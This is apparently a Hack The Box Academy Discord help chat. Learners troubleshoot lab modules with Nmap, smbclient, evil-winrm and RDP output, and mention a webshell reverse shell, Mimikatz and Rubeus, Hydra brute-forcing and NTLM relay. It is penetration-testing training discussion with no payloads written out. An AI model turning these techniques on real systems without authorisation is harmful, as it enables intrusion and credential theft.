Hi Chat, i have a question before posting it in the erratum channel. In a deauthentication attack environment, one of the reasons attackers do deauthentication attacks is to disconnect a user from their network so they join ours so we can retrieve their information right ? Because the text says the opposite and it does not make sense for me, why would i enforce a user to disconnect from my network so they can join theirs for me to retrieve information ?
How do I get more cubes or is it a buy only thing
During the last season, you could win Cubes.
https://www.hackthebox.com/blog/HTB-Season-7-Vice
Sometimes you can also win Cubes in competitions. Just keep an eye out for them on HTB's social media channels.
Otherwise, the only option is to purchase Cubes.
Please refrain from posting content over Tier 0, especially when it contains credentials.
You need to pivot
Anyone did the new Attacking AI - Application and System? Currently stuck at https://academy.hackthebox.com/module/315/section/3769
I'm currently stumped on the Firewall and IDS/IPS Evasion - Hard Lab. I can get the versions on ||22 and 80|| but I'm a little lost on what to do next.
Dms accepted
hi everybody
somebody can help me in DM with the module Skills Assessment of password cracking ? i'm really stuck PLEEEEASE
thanks
Hi all, when trying to connect to the target system via RDP, the target server terminates connection before providing the remote screen:
[19:14:35:409] [14773:000039b7] [WARN][com.freerdp.crypto] - [verify_cb]: Certificate verification failure 'self-signed certificate (18)' at stack position 0
[19:14:35:409] [14773:000039b7] [WARN][com.freerdp.crypto] - [verify_cb]: CN = WINMEDIUM
Domain: WINMEDIUM
Password:
[19:14:46:966] [14773:000039b7] [INFO][com.freerdp.gdi] - [gdi_init_ex]: Remote framebuffer format fusermount3: mounting over filesystem type 0x858458f6 is forbidden
[19:15:20:137] [14773:000039b7] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 110: Die Wartezeit für die Verbindung ist abgelaufen
[19:15:20:137] [14773:000039b7] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[19:15:20:142] [14773:000039b7] [ERROR][com.freerdp.core.transport] - [transport_default_write]: BIO_should_retry returned an error: error:80000020:system library::Datenübergabe unterbrochen (broken pipe)
[19:15:20:142] [14773:000039b7] [INFO][com.freerdp.client.common] - [client_auto_reconnect_ex]: Network disconnect!
Any idea, how to get connected?
have u tried to put /cert-ignore ?
problem persists with any of both /cert:ignore and /cert:tofu
with any of both clients xfreerdp and remmina
When they ask you to use apt-cache search impacket to find info about "impackets".
Why not use apt search impacket instead?? Given what I found is that apt-cache is more legacy and the newer apt combines the features of apt-get and apt-cache. Correct me if I'm wrong.
Module - Linux Fundamentals Section: Package Management Subsection: Questions
Hii, i am doing AD SKILL ASSESSMENT 1 FROM cpts path they give us antak webshell, i pasted powershell one liner to get reversal and I successfully got reverse shell, but when i transferred tools like rubeus mimikatz nothing is working
I tried powerview
Its also not working
Any idea what should i do
Have you tried ||apt-cache show impackets|| ?
No I found the answer already, thank you for that. But I'm just wondering why
I used that, because I was told to use that in the section.
🥺🥺
Is this the place where we talk about today's retire machine we supposed to hack ?
Got ya. I still use apt-cache with some grep magic in a bash script to search for packages.
try to put ' before and after username and password
No but, hasn't apt incorporated apt-caches functionality into it and now you can just call apt search?
I think boxes is the place for that
Hello
Hello
Am I the only one who struggles on DNS Tunneling with Dnscat2 just because the box is soooooooo unstable, I can't keep my rdp for like 2 minutes long
I don't think there is any channel name with that
From what I see apt search is just a prettier list than apt-cache. That might just be the difference. Although apt search does put everything alphabetical
Now i can see it. I forgot to verify after i register
guys im new in this server how to talk in general ??
Password Cracking - Skills Assessment
What is hash Nexura/Administrator
i am inside the DMZ and i set the proxy for execute inside the DMZ from my machine but i don't know how access to an internal host
some hint ?
please i'm really stuck
Anyone here?
no
ok thx
Can anyone help with the pass the Certificate first question? I receive the following error when attempting to connect via evil-winrm
evil-winrm -i DC01.INLANEFREIGHT.LOCAL -r INLANEFREIGHT.LOCAL
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot contact any KDC for realm 'INLANEFREIGHT.LOCAL'
Error: Exiting with code 1
Do you have inlanefreight.local in your hosts file?
nope. Should I? How do I know what's the related ip address?
By the time you hit that module you should know how to do it, you may want to consider taking some of the OS fundamental modules before diving in deeper to stuff. The IP you spawn when you click "Spawn target" usually has a hostname associated with it, I'm assuming that's the hostname for the target you spawned in that module.
Some exercises require being able to resolve a hostname
my question was because apparently from a pwnbox machine/ attacker host via vpn you cannot resolve inlanefreight.local hostname
Yeah, as I mentioned, you'll often need to add the host to your hosts file in the attacker box.
I got what you said and I was able to grab the flag thanks. However that was a big assumption
It's pretty normal
A lot of tools require being able to resolve the host, especially AD stuff
nmap -sV -sC -p- -Pn 10.129.58.177
Starting Nmap 7.95 ( https://nmap.org/ ) at 2025-08-24 20:54 +01
Nmap scan report for 10.129.58.177
Host is up (0.11s latency).
All 65535 scanned ports on 10.129.58.177 are in ignored states.
Not shown: 50326 filtered tcp ports (no-response), 15209 filtered tcp ports (time-exceeded)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.95 seconds
im trying to complete a htb module
i found no solution on google
All links broken -- Wrong documentation links
Post in #1234357888114364508
The content in the module guide is completely different than the environment
No idea what you're talking about but please don't reveal content from modules above tier 0
sry
Answer the question(s) below to complete this Section and earn cubes!
Target(s): 10.129.58.163 (ACADEMY-GETSTART-SVCSCAN)
Life Left: 118 minute(s)
- 1 Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?
here is the question
Make sure you're on the VPN or using the Pwnbox only, not both at the same time. You should be able to reach the target and perform a scan.
i can't spawn instance
Why
i have none left
you mean pwnbox?
yes
VM is a much better experience anyway
i got it working but it dont show version
I'm having trouble with the pwnbox.
The input USER anonymous[Ctrl + V] [Enter][Enter] doesn't work in any way.
Can someone help ?
You can't just paste into the Pwnbox, you have to use the copy/paste function in the lower right corner
It opens the clipboard and lets you input things in there
8080/tcp filtered http-proxy time-exceeded from 81.192.249.78 ttl 251
it don't show version
Okay I try tomorrow. Thank you ❤️
help pls
That IP looks wrong
You will get much better help if you include the module, section, and question you're on.
Okay, did you try running the commands shown in the module? Your nmap command is different.
yes
nmap -sV 10.129.157.188
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 22:02 +01
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 1.47 seconds
it shows this
okay, so you're not doing what was shown. When you run it like that, it only scans the top 1000 ports
Try specifying the port to find info about that specific port
nmap -sV -Pn -p 8080 10.129.157.188
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 22:06 +01
Nmap scan report for 10.129.157.188
Host is up (0.032s latency).
PORT STATE SERVICE VERSION
8080/tcp filtered http-proxy
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.96 seconds
still no version
Maybe try the -A flag
nmap -sV -Pn -p 8080 -A 10.129.157.188
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 22:10 +01
Nmap scan report for 10.129.157.188
Host is up (0.028s latency).
PORT STATE SERVICE VERSION
8080/tcp filtered http-proxy
Too many fingerprints match this host to give specific OS details
Could be a version thing, not sure
is there a solution
Are you using the pwnbox?
no
maybe try visiting the port in a browser or use netcat or something
maybe try using the pwnbox, it may have a different version of nmap that gives different results
This is definitely an early on question but in the Networking portion of the academy it asks "What type of network cable is used to transmit data over long distances with minimal signal loss?" I've tried various versions of fiber optic and ethernet but keeps on coming back negative.
Not sure if I'm missing something or somehow just off base enough to not get this one. Any suggestions would be awesome
Best to include the module and section
Network Foundations/Components of a Network, it's the first question in that section, and I don't know if I'm missing something simple or what the deal is. Worked past that section without any issues, just dumbfounded as to what it would be if not fiber optic
word1-word2 format
No format specified, I've tried a number of different formats though with no luck
Hey does anybody have some pointers for the Attacking FTP section of Attacking Common Services in the CPTS course?
I ran my NMAP scan against ALL ports with -p- but there aren't any open ports serving FTP, so instead I'm attempting to brute force SSH with hydra and the user and pw list from the resources section, but it says it could take over an hour to try every combo
What's the right approach for this section if I might ask? Just need a hint
You can DM me
smbclient -L 10.129.58.163 -U bob
do_connect: Connection to 10.129.58.163 failed (Error NT_STATUS_IO_TIMEOUT)
I'm still on that same module
That's a connection error
i do have connection
You were using pwnbox at one point right? You don't want to use both at the same time. If you used both, reset the target and maybe reconnect to the VPN
yeah but that's a timeout error, network related
so reset everything
ok I'll do that
Is the Attacking FTP module broken? Saw some other people were having issues with it in here too. Some recommend connecting to the SSH service to try to start FTP, and others say to keep resetting the target until FTP shows up on an open port?
i did reset the target but nothing
smbclient -L 10.129.89.230 -U bob
do_connect: Connection to 10.129.89.230 failed (Error NT_STATUS_IO_TIMEOUT
it's filtered
can someone give me answer
did you even log in correctly?
where
did you connect to the right share and logging in with the correct user:password?
yes
timeout
This is a connection error
Reconnect to the vpn
sudo killall openvpn
Then do the Reconnect
Has anyone done ntlm relay attacks, I can't finish question 4
You can DM what you've tried and configured.
This module covers the basics needed for working with Bash scripts to automate tasks on Linux systems. A strong grasp of Bash is a fundamental skill for anyone working in a technical information security role. Through the power of automation, we can unlock the Linux operating system's full potential and efficiently perform habitual tasks.
Hi Bro
Hello, could you please help me with this:
There is something missing in the answer but, I don't get it
are you doing the CPTS course? I remember seeing this in the first reading module of attacking common services
might find it there
or capital R maybe
@gray yacht I figured it out, thanks tho
okay yea I would check that reading module i mentioned then if you have access
fundamentals lesson? do Get-ChildItem help
get-help getCHildItem or something like that
I think my answer is correct but I need to connect my answer with something that I haven't found yet
make sure you put yourself in ps right
a modifier is what you add to the cmdlet
do get-help getchilditem it should say the modifiers to use and how they work
Cool deal